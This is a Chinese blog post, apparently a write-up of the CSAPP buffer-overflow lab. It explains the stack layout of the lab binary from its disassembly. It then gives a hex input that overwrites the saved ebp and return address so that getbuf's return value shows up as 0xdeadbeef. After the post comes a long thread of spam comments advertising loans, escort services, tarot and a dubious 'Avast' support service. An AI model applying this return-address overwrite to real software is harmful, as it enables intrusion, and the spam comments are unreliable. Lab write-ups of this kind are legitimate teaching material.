CSAPP:缓冲区溢出攻击实验(Part 2)
有了反汇编,在结合源码来找思路:
1:
main函数里,作者使用了一个little hack trick
int main() { int buf[16]; /* This little hack is an attempt to get the stack to be in a stable position */ int offset = (((int) buf) & 0xFFF); int *space = (int *) alloca(offset); *space = 0; /* So that don't get complaint of unused variable */ test(); return 0; }
因为栈是向下生长,且linux有一种对栈的随机保护机制,即最初的ebp在2^23字节范围内浮动
而linux通常一个page的大小为4k;
所以offset & 0xfff 即可得到当前的esp所在的页的 剩余字节数。
-------4k
esp
-------0
esp的低12位即为当前页的剩余字节数。main的作用之一就是确保在进入test函数时,使用的是一个全新的page.同时也确保了进入test时,ebp为一确定值。
根据汇编流程,对栈帧的分析 可以得到如下的栈结构:
addr content bfffefdc 080485a5(eip return to main) bfffefd8 bffff6e8(save ebp for main) bfffefd8 test's ebp . . bfffefcc **ebp-12**,the return value of getbuf . . . . bfffefb0 esp(for test) bfffefac 08048543(eip return to test) bfffefa8 bfffefd8(save ebp for test) . . . bfffef94 &buf . . . bfffef80 buf(arg) bfffef7c 08048524 (eip return to getbuf) bfffef78 ebp getxs's ebp
于是有思路了,通过向buf写入多于12字节的内容,达到改写栈的效果,而主要改写的内容则为ebp(bfffefa8),eip(bfffefac),esp(bfffefb0).
再仔细研究,反汇编test的部分代码:printf("getbuf returned 0x%x\n", val);
0x08048539 <+14>: e8 3a fe ff ff call 0x8048378 <printf@plt> 0x0804853e <+19>: e8 d0 ff ff ff call 0x8048513 <getbuf> 0x08048543 <+24>: 89 45 f4 mov %eax,-0xc(%ebp) => 0x08048546 <+27>: b8 91 86 04 08 mov $0x8048691,%eax 0x0804854b <+32>: 8b 55 f4 mov -0xc(%ebp),%edx 0x0804854e <+35>: 89 54 24 04 mov %edx,0x4(%esp) 0x08048552 <+39>: 89 04 24 mov %eax,(%esp)
从箭头的上面一行开始看,getbuf的返回值在eax中。之后eax存入-0xc(%ebp),字符串地址存入edx,然后printf的参数一次进栈(由右至左),特别注意getbuf返回值的动向:eax存入-0xc(%ebp),-0xc(%ebp)作为参数存入0x4(%esp).从这里发现:只要让eax对-0x(%ebp)的赋值失效,然后在-0x(%ebp)处写入自己希望的值,即可让该值如栈,达到"改写" val的效果.那怎么让eax对-0x(%ebp)的赋值失效?可以通过getbuf返回时,要恢复的eip处下手,如果让eip运行的指令地址为0x08048546即可(原为0x08048543)。两eip差为三。则可以将bffefac处的内容改写为0x08048546.之后为了顺利返回,保持原本的栈结构。bffefa8(ebp)及bfffefb0(esp)可保持原样写入。最后一步,由于-0xc(%ebp)的赋值为“未初始化”,最后向该地址写入 “希望的内容”后,该内容即可作为printf的参数了。done.
00000000 00000001 00000002 00000003 00000004 d8efffbf 46850408 00f0ffbf 00000008 00000009 0000000a 0000000b 0000000c 0000000d efbeadde
不要忘记忽略大小端的影响!本输入内容为小端环境!
最后根据这个思路,在生成执行文件是若不使用-fno-stack-protector,也应该可以实现该效果,就不多说了。欢迎讨论,提供新思路:D
Sun, 24 Apr 2022 09:15:35 -1100
Hey what a brilliant post I have come across and believe me I have been searching out for this similar kind of post for past a week and hardly came across this. Thank you very much and will look for more postings from you. Merchant Services ISO Program
Thu, 28 Apr 2022 06:22:43 -1100
Thanks for this excellent article. One other thing is that a lot of digital cameras come equipped with the zoom lens that enables more or less of your scene to get included by means of ‘zooming’ in and out. All these changes in concentration length are usually reflected while in the viewfinder and on significant display screen right at the back of the specific camera. ISO Agent Program
Sat, 16 Nov 2024 18:59:23 -1100
I could have sworn I’ve been to this website before but after reading through some of the post. I feel that it is best to compose more on this matter, it may not be an unthinkable theme however generally people are insufficient to chat on such subjects.
Sat, 16 Nov 2024 21:54:14 -1100
I am looking forward to seeing more posts by you as soon as possible! Call Girls in Karachi you have done a great job. I will definitely dig it and personally recommend it to my friends. I am confident they will be benefited from this site
Sat, 16 Nov 2024 21:55:05 -1100
There is no way to have to master in religious studies if you are interested in attending Christian university. Instead of this, the students are allowed to choose any of the typical major they would like to endure or even got for religion studies, which refers to the ideas that there are no restrictions.
Sat, 16 Nov 2024 21:56:08 -1100
Ordinary this submit is totaly unrelated to what I was looking out google for, nevertheless it was indexed at the first page. I suppose your doing something proper if Google likes you enough to place you at the first page of a non related search.
Sat, 16 Nov 2024 21:57:10 -1100
Considerably, the post is really the greatest on this worthy topic. I agree with your conclusions and can eagerly look forward to your future updates. Simply just saying thanks can not simply be sufficient, for the fantasti c clarity in your writing. I will perfect away grab your rss feed to stay abreast of any updates. Genuine work and also much success in your business dealings!
Sat, 16 Nov 2024 21:57:57 -1100
Your website is very interesting, it is very meaningful and inspirational. I think your website deserves to be the number one. hopefully it could be real.
Sat, 16 Nov 2024 21:58:49 -1100
Ordinary this submit is totaly unrelated to what I was looking out google for, nevertheless it was indexed at the first page. I suppose your doing something proper if Google likes you enough to place you at the first page of a non related search.
Sat, 16 Nov 2024 22:11:30 -1100
Nice post. I understand some thing much harder on various blogs everyday. Most commonly it is stimulating to study content off their writers and use a little something from their site. I’d prefer to apply certain with all the content on my small blog regardless of whether you don’t mind. Natually I’ll give you a link on your internet weblog. Thanks for sharing.
Sat, 16 Nov 2024 22:12:18 -1100
Really great post, Thank you for sharing This knowledge.Excellently written article, if only all bloggers offered the same level of content as you, the internet would be a much better place. Please keep it up!
Sat, 16 Nov 2024 22:13:12 -1100
What’s Near Me has been created with one focus in mind, to solve the problem of people struggling to find likeminded people and to bring them together through a vast and powerful network.
Sat, 16 Nov 2024 22:13:58 -1100
We at British Lenders provides loans for those people who have bad credit score. We offer bad credit loans no guarantor on cheap interest rates without upfront charges. Our online process has made the terms and conditions flexible for you.
Sat, 16 Nov 2024 22:14:39 -1100
An example of this can be Atypical Mole Syndrome. This syndrome brings about a tendency within the body to type an excessive amount of moles on our skin. This really is something that we could have obtained from our parents or our grandparents and we’ve no manage over whether or not we receive it or not.
Sat, 16 Nov 2024 22:15:28 -1100
The teaching for testing examinations is one of the most tried in our country . Therefore, the level of competition is very high. Getting a good score in this test can be done by a good teacher or faculty .
Sat, 16 Nov 2024 22:16:11 -1100
Ordinary this submit is totaly unrelated to what I was looking out google for, nevertheless it was indexed at the first page. I suppose your doing something proper if Google likes you enough to place you at the first page of a non related search.
Sat, 16 Nov 2024 22:17:01 -1100
I'm going to read this. I'll be sure to come back. thanks for sharing. and also This article gives the light in which we can observe the reality. this is very nice one and gives indepth information. thanks for this nice article
Sat, 16 Nov 2024 22:17:42 -1100
There is no way to have to master in religious studies if you are interested in attending Christian university. Instead of this, the students are allowed to choose any of the typical major they would like to endure or even got for religion studies, which refers to the ideas that there are no restrictions.
Sat, 16 Nov 2024 22:18:31 -1100
Avast Customer Support is a third party technical support service. We are here to help you out with the whole procedure to Download Avast Antivirus online, We not only fix your Avast setup related issues but will guide with how to get started with your new Avast product once it gets installed successfully. We at Avast Tech Support provides service to protect your PC from potential online threats and external attacks like viruses, Trojans, malwares, spywares and phishing scams. And Avast Refund.
Sat, 16 Nov 2024 22:19:29 -1100
I'm glad I found this web site, I couldn't find any knowledge on this matter prior to.Also operate a site and if you are ever interested in doing some visitor writing for me if possible feel free to let me know, im always look for people to check out my web site.
Sat, 16 Nov 2024 22:45:13 -1100
What’s Near Me has been created with one focus in mind, to solve the problem of people struggling to find likeminded people and to bring them together through a vast and powerful network.
Sat, 16 Nov 2024 23:19:00 -1100
Easily, the article is actually the best topic on this registry related issue. I fit in with your conclusions and will eagerly look forward to your next updates. Just saying thanks will not just be sufficient, for the fantasti c lucidity in your writing. I will instantly grab your rss feed to stay informed of any updates.
Sat, 16 Nov 2024 23:40:51 -1100
Why should they pick your product or service rather than its competitors, what promos do you offer, how can they purchase your product or service and whether they can get their money back if your product or service failed to deliver what you had promised
Sun, 17 Nov 2024 00:04:33 -1100
interpretation tirage tarot aufeminin tarot quand jouer atout tarot carte du jour le bateleur tarot tarot divinatoire hebdomadaire gratuit tarot a cinq gratuit boutique jeu tarot paris tarot amour marie claire tarot marseille carte 8 tarot gratuit journee voyance gratuite
Sun, 17 Nov 2024 00:50:37 -1100
is best autonomous and Top ranking medical university in Philippines-Davao. Studying MBBS in the Philippines for Indian students, there is no doubt that you are in the right place | Low Tuition Fees | Highly Secured Hostels | North and South Indian Foods | Complete End to End Care for Students | Call: +91-88077 44400
Sun, 17 Nov 2024 01:54:11 -1100
Considerably, the post is really the greatest on this worthy topic. I agree with your conclusions and can eagerly look forward to your future updates. Simply just saying thanks can not simply be sufficient, for the fantasti c clarity in your writing. I will perfect away grab your rss feed to stay abreast of any updates. Genuine work and also much success in your business dealings!